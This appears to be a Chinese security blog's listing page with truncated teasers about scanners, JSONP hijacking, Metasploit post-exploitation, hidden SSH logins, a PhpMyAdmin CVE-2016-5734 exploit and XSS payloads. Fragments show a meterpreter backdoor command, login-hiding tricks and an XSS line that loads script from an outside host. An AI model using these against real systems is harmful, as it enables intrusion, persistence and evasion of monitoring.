安全行业从业人员自研开源扫描器合集

子域名枚举类 https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本) https://github.com/ring04h/wydomain (子域名字典穷举)...

阅读全文

jsonp跨域劫持姿势

利用场景: 对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用.例如:http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1有ca...

阅读全文

msf 常用渗透模块----POST

创建服务作为后门meterpreter > run metsvc查看目标主机的内网IP段情况meterpreter > run get_local_subnets添加路由表和对应的sessionroute add 1...

阅读全文

linux隐身登录技巧

方法1：隐藏的远程登录(w 看不到)ssh -T user @ host 登录后执行：/bin/bash -i 然后就可以执行bash命令了，执行w看，登录是空的。方法2：隐藏的远程登录(w 看不到)ssh -o UserKnow...

阅读全文

PhpMyAdmin 4.6.2后台命令执行Exp（cve-2016-5734）

cve-2016-5734利用EXP说明：登录PhpMyadmin后可以直接执行命令，提权。CODE：#!/usr/bin/env python"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2...

阅读全文

XSS Playload 集合

更新时间：2017年03月16日javascript:s=document.createElement('script');s.src='http://www.xxx.com/xss.js';document.body.appendC...

阅读全文

互联网安全Blog Top30

1、We Live Security地址：http://www.welivesecurity.com/简介：主要研究网络威胁和恶意软件。文章更新频率：9篇/周2、Intel Security | McAfee Blogs地址：http...

阅读全文